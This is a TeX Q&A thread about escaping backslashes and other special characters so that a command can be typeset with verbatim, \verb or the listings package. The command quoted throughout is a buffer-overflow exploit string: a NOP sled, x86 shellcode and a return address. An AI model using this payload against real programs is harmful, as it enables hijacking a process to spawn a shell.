# Escape lots of backslashes and other special characters

Tags: formatting, symbols, verbatim

I'm trying to write a Unix command in LaTeX, but it seems to be stuck on special characters. Is there a way to escape backslashes, accolades, dollar signs etc.?
The command is the following

```
$(python -c 'print "\x90" * 653 + "\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x78\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80" + "\x98\xf2\xff\xbf"')
```

However, the following error occurs:

> ! Undefined control sequence.
>   l.37    $(python -c 'print "\x
>                               90" * 653 + "\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x7...

I also tried the `\verbatim`, but that doesn't work either.

Comment: `\begin{verbatim} ... \end{verbatim}` works fine with your code for me. Note that both `\begin{verbatim}` and `\end{verbatim}` must be on separate lines and don't include any other characters, including whitespaces.

Answer (score 1):

Welcome `TSE`.

You can put such kind of text enclosed in `verbatim` environment but I mainly suggest you if you have many lines of codes in your document it would be better to use `listings` or `minted` packages. For more details read the manual of the packages, there are plenty of options you can apply it.

I hope the following helps you.

```
\documentclass{article}

\usepackage{listings}

\begin{document}
\noindent\verb|$(python -c 'print "\x90" * 653 + "\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x78\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80" + "\x98\xf2\xff\xbf"')|

\begin{verbatim}
$(python -c 'print "\x90" * 653 + "\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x78\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80" + "\x98\xf2\xff\xbf"')
\end{verbatim}

\lstset{
    stringstyle=\ttfamily,
    breaklines=true,
    frame=line
}
\begin{lstlisting}[language=python, title={My Code}]
$(python -c 'print "\x90" * 653 + "\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x78\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80" + "\x98\xf2\xff\xbf"')
\end{lstlisting}

\end{document}
```

[image]